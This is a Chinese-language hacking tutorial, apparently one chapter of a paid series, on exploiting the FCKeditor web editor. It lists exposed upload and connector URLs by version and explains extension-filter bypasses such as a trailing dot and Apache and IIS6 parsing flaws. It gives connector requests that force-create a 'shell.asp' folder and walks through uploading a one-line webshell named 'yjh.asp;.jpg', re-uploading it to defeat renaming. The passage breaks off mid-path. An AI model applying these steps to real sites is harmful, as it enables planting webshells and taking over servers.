第二十部分FCK编辑器利用.docVIP

FckEditor编辑器利用方法: 查看版本的方法: 第一种:FCKeditor/_whatsnew.html（通常会被管理员删除） 第二种:FCKeditor/editor/dialog/fck_about.html(常用方式) 版本不同利用方法不同。 各版本利用地址 FCKeditor v2.4.3 1.FCKeditor/editor/filemanager/browser/default/connectors/test.html 2.FCKeditor/editor/filemanager/upload/test.html 3.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFilesType=ImageCurrentFolder=/ 4.FCKeditor/editor/filemanager/browser/default/browser.html?type=Imageconnector=connectors/asp/connector.asp 5.FCKeditor/editor/filemanager/browser/default/browser.html?Type=ImageConnector=/fckeditor/editor/filemanager/connectors/php/connector.php FCKeditor V2.6.6 1.FCKeditor/editor/filemanager/connectors/test.html 2.FCKeditor/editor/filemanager/connectors/uploadtest.html ----------------------------------------------------------------------- 过滤不严 FCKeditor x.x - FCKeditor v2.4.3 影响版本:FCKeditor x.x = FCKeditor v2.4.3 脆弱描述： FCKeditor v2.4.3中File类别默认拒绝上传类型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc| pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm Fckeditor 2.0 = 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件 上传后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension为后缀 直接导致在win下在上传文件后面加个.来突破 而在apache下，因为Apache文件名解析缺陷漏洞也可以利用之。 攻击利用: 允许其他任何后缀上传 强制建立shell.asp目录： FCKeditor V2.6.X FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=/shell.aspNewFolderName=zuuid=1244789975684 FCKeditor v2.4.X FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp 实例演示： / Fckeditor版本(V2.6.3)： /fckeditor/editor/dialog/fck_about.html 存在uploadtest.html页面 /FCKeditor/editor/filemanager/connectors/uploadtest.html 主站使用aspx，这里选择ASP.Net: Resource Type选择Image IIS6.0,可以使用解析漏洞，例如：xx.asp;.jpg 这里我们上传小马,小马名字命名为yjh.asp;.jpg 上传成功，但是，名字yjh_asp;.jpg，”.”变”_”了，我们二次上传看看。 没问题上传成功了。一句话木马地址是 //UserFiles/yjh.